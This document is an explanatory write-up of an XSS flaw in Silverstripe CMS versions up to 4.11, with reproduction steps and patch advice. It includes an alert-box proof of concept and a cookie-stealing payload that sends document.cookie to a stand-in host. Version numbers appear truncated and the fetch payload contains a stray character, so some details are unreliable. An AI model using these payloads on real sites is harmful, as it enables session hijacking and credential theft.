CVE-2022-37421 - Exploiting XSS in Silverstripe CMS ≤ 4.11.

In 2022, a vulnerability, CVE-2022-37421, was discovered in the popular open-source Content Management System Silverstripe (specifically silverstripe/cms, up to and including version 4.11.). This flaw allows an attacker to inject harmful JavaScript into web pages, which could result in Cross-Site Scripting (XSS) attacks.

Let’s break down how this vulnerability works, how to reproduce it, and how to patch it.

What is XSS?

Cross-Site Scripting (XSS) is a type of security problem where malicious scripts are injected into trusted websites. Unsuspecting users can have their session tokens stolen, be redirected to malicious sites, or have sensitive data exposed.

The Issue: Where’s the Bug in Silverstripe?

Silverstripe is built with PHP, and like many CMS platforms, it processes user content for web display. In versions up to 4.11., there was an insufficient sanitization of user-supplied data. This allowed an attacker to include JavaScript content through certain CMS fields—typically, fields that end up being rendered without proper escaping.

This vulnerability is most problematic in areas that allow HTML editing or arbitrary content, such as page titles, summary fields, or custom data fields.

The Reference

- NVD Description: CVE-2022-37421
- Silverstripe Disclosure (archived)

How to Reproduce the Attack

Here’s a simple step-by-step replication guide, using a basic Silverstripe installation with a field vulnerable to XSS:

You can quickly deploy Silverstripe with Composer

composer create-project silverstripe/installer mysite 4.11.
cd mysite
composer require silverstripe/cms:4.11.

2. Find a Vulnerable Field

Typically, a vulnerable field might be a page’s title or summary if displayed without proper sanitization.

For demonstration, let’s say the 'Title' field is output raw in a template

<!-- themes/simple/templates/Page.ss -->
<h1>$Title</h1>

Login as a CMS editor (lowest privilege available). Edit the "Title" of a page to the following

"><script>alert('XSS')</script>

4. View the Page

Visit the URL of the page on the public site. You will see a JavaScript alert box pop up—a sign that the code has executed in your browser.

Why Does This Happen?

In Silverstripe templates, variables should always be escaped unless you really need raw HTML. The normal way to escape is using .XML, like this:

<h1>$Title.XML</h1>

But if the developer forgets, or intentionally disables it, user input can become a vector for attack.

Here’s what an exploit—or just a proof-of-concept—could look like

"><script>fetch('https://evil.example.com/steal?cookie='; + document.cookie)</script>

When a user with admin privileges loads the page, their session cookies will be sent to the attacker-controlled domain.

How to Patch or Prevent

Upgrade!  
Upgrade silverstripe/cms to version 4.11.1 or newer, where this is fixed.

Always use .XML in templates unless raw HTML is needed.

- Sanitize input in controllers/models before output.
- Use Silverstripe’s built-in HTML sanitization.

Quick patch for template

<!-- themes/simple/templates/Page.ss -->
<h1>$Title.XML</h1>

Remediation Steps

1. Audit your codebase for instances where user data is rendered without .XML or proper sanitization.

Final Thoughts

CVE-2022-37421 is a classic reminder: Always escape user output—even if you “trust” the data! With content CMSs like Silverstripe, XSS can damage trust, steal admin credentials, or hijack user sessions.

Making a simple template change or upgrading can be the difference between a secure and compromised site.

References

- CVE-2022-37421 on NVD
- Silverstripe Official Security Releases
- Silverstripe Templates and Escaping

Timeline

Published on: 11/23/2022 03:15:00 UTC
Last modified on: 11/30/2022 14:43:00 UTC